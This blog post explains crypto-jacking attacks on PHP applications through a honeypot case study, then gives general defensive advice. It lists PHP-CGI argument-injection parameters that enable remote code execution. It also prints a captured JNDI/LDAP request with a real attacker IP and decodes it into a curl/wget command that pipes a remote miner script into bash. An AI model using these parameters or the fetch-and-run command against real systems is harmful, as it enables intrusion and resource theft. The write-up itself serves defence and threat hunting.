Crypto-Miners Love PHP: Understanding and Stopping Offshore Exploits

by Tanu JainMay 15th, 2025
Read on Terminal Reader
Read this story w/o Javascript
tldt arrow

Too Long; Didn't Read

PHP's flexibility makes it a favorite target for crypto-mining malware via RCE exploits. This guide explains how attackers use malicious scripts, demonstrates honeypot detection techniques, and offers proactive defense tips like patching, user education, and anomaly detection to help organizations stop crypto-jacking attacks early.

Coin Mentioned

Mention Thumbnail
featured image - Crypto-Miners Love PHP: Understanding and Stopping Offshore Exploits
Tanu Jain HackerNoon profile picture
0-item
1-item


The widespread use of the PHP scripting language poses a significant threat of being exploited by cybercriminals. The advantage of the threat actor is its exploitability in the form of remote code execution (RCE) and the ready availability of proof-of-concept (PoC) codes. In this guide, I'll explain how crypto mining malware can exploit PHP applications in the wild. We will also learn about some proactive measures organizations can take to protect themselves.

Understanding the Crypto-Miner Malware Threat

Cryptocurrency is a digital currency that uses cryptography to secure online transactions. Cryptocurrency is a commodity that can be transacted in exchange for goods and services. Unlike other forms of currency, this digital currency uses blockchain technology, a public ledger that uses encryption security techniques to verify fund transfer transactions.


Crypto-mining, also known as crypto-jacking, is the illegitimate use of the computing resources of end users' desktops, mobile phones, and IoT devices to mine cryptocurrency without the user's noticing. Crypto-miner malware is malicious software used to perform unintentional activities such as crypto-jacking, leveraging the computer power of user’s systems to mine cryptocurrency without their authorization. Threat actors deploy these malicious programs to the target systems and increase their aggregated computing power to accelerate cryptocurrency mining. It significantly fuels their chances of earning cryptocurrency by solving the equation without adding any cost burden to the threat actor. Crypto-miner malware often uses the CPU computing power without getting noticed by the end-user, thinking that their systems are simply running slow. However, the threat actor uses the system's computing and memory power.


Threat intelligence reports highlighted the rise of crypto-malware in recent years:


  • A threat report published by the Center for Internet Security in April 2025 discussed the top 10 malware threats in the first quarter of 2025, and crypto-malware is at No.3 in their list.
  • As per SonicWall's white paper, the increase in crypto-jacking attacks to 1.06 billion crypto-jackings in 2023 is 659% over 2022's threats. Compared to 2023, encrypted malware threats have doubled in 2024, targeting specific sectors, including government, retail, and education. The attack surface rose to 30% in North America, 182% in Europe, and 462% in Asia.


Crypto miners easily exploit PHP applications because they allow attackers to download and execute crypto mining scripts and take remote control.


Now, let's dive deep into how crypto miners can exploit such PHP applications by creating a web application honeypot to deceive attackers.

Understanding Proactive Threat Hunting- Reactive vs Proactive

Threat hunting is an iterative, proactive cybersecurity process. It actively searches for any potential signs of cybersecurity breaches or traces of possible threats within an enterprise network on all layers of network infrastructure, including networks, endpoint systems, application servers, etc.


Broadly, reactive and proactive are the two categories of threat hunting. Reactive threat hunting is a traditional approach that organizations have practiced for several years. Generally, the defensive security tools are reactive; they neutralize the threats after the breach has happened by leveraging the help of an automated incident response team. The reactive approach has a few shortcomings as it relies on the assumption that all threats can be detected. However, detecting all the cyber threats is not always possible, causing potential business loss if any undetected attack happens. A key limitation of the reactive approach is its assumption that all threats are detectable. Since this is not always true, undetected attacks can result in potential business losses.


Conversely, a proactive security approach actively searches for vulnerabilities and threats in an enterprise network before cybercriminals can exploit them, causing actual damage. The benefit of a proactive approach is that it makes the enterprise stay ahead in the race. Security defenders are equipped with several proactive tools such as artificial intelligence, log analytics, deception tools, honeypots, etc. Among these, a honeypot is a proactive system or application designed as a trap to attract malicious activities that try to infect computer networks with phishing, vulnerability exploitation, and other nefarious methods and approaches.


Let's deep dive into trapping crypto-malware using a honeypot. A real-world PHP application is hosted on a honeypot trap machine. The following steps illustrate the remote attacker exploiting the misconfigured PHP-CGI vulnerabilities to inject the PHP script into web applications.


  • Decoded Malicious Request- Hackers exploit vulnerabilities and inject malicious programs into the CGI RCE program. Afterwards, hackers inject an executable program into the client's browser or the web application.


By setting the following parameters, the attacker can exploit the RCE vulnerability of the PHP application:


Parameter

Purpose

-d cgi.force_redirect=0

Bypasses PHP-CGI direct invocation protection

-d disable_functions

Re-enables all PHP functions, including dangerous ones

-d allow_url_include=1

Allows inclusion of remote files which is a common in remote code execution (RCE) attacks

-d auto_prepend_file=php://input

Executes raw PHP code from the POST body


  • Detection Metadata:

Rule Engine: OWASP CRS (Paranoia Level 1)

Matched Tags: application-multi, attack-protocol, attack-injection-php, injection-nodes

ModSecurity Score: 27.488


Figure 1 : Traffic spike observations on honeypot logs indicating the anomalous activity


The honeypot machine starts receiving the traffic from a remote IP address as depicted in Figure 1. The collected logs are parsed and modeled in an ElasticSearch database. The raw logs can be seen below:


"attack_data": "{"request": "GET /$%7Bj$%7Bk8s:k5:-ND%7Di$%7Bsd:k5:-:%7Dldap://46.8.226.196:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1", "user-Agent": "${j${k8s:k5:-ND}i${sd:k5:-:}


Raw Logs Captured on Web Application Honeypot


Encoded Base64 Patterns

ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw


Decoded Base64 Patterns

When the Base64 patterns is decoded, the following commands were executed by the remote attacker on a honeypot machine:


export HOME=/tmp; curl -s -L http://<remote-IP>/scripts/4thepool_miner.sh | bash -s; wget -qO- http:// remote-IP /scripts/4thepool_miner.sh | bash –s


It can be observed that the attacker downloads a "4thepool_miner.sh" bash script into the /tmp folder of the target system and executes it. Hackers attempt to download the "4thepool_miner.sh" through an HTTP connection to the remote server or download it using the "wget" command through the command line interface.


Thereafter, attackers deceive "4thepool_miner.sh" script to install, set up, and run XMRig, a Monero miner.

Defense Against the Crypto-Malware Cyber Threats

In recent years, the cybersecurity risks posed by crypto-malware targeting organizations and users to mine their computing resources for wrongful purposes have evolved. The crypto-malware creators used to have made their detection extremely difficult by adopting traditional security practices. The best remedy for protection against these attacks is to use the Internet-connected resources more responsibly. The users in an organization network must be regularly aware of digital hygiene and the potential misuse of the Internet.


A few of them include:


  • Educate employees not to click unsolicited links and to download only from trusted sources.
  • Enforce safe Internet browsing in an organization.
  • Deploy a spam filter to avoid and filter unwanted, infected emails that reach users in an organization's network.
  • Deploy advanced anti-malware defense systems and invest in cybersecurity software.
  • Fully patch the operating systems, applications, services, network devices, etc.
  • Enforce regular scanning and analysis of any possible malicious activities, including email attachments, messages, indicators of malicious activity, etc.
  • Adapt new technologies such as artificial intelligence and anomaly detection systems to discover unknown attack patterns.
  • Leverage simulation in attack generation scenarios to test the full-proof security architecture and identify any open vulnerabilities and misconfigurations in a network.
  • Adapt proactive cybersecurity measures to detect and mitigate any potential attack patterns.


Trending Topics

blockchaincryptocurrencyhackernoon-top-storyprogrammingsoftware-developmenttechnologystartuphackernoon-booksBitcoinbooks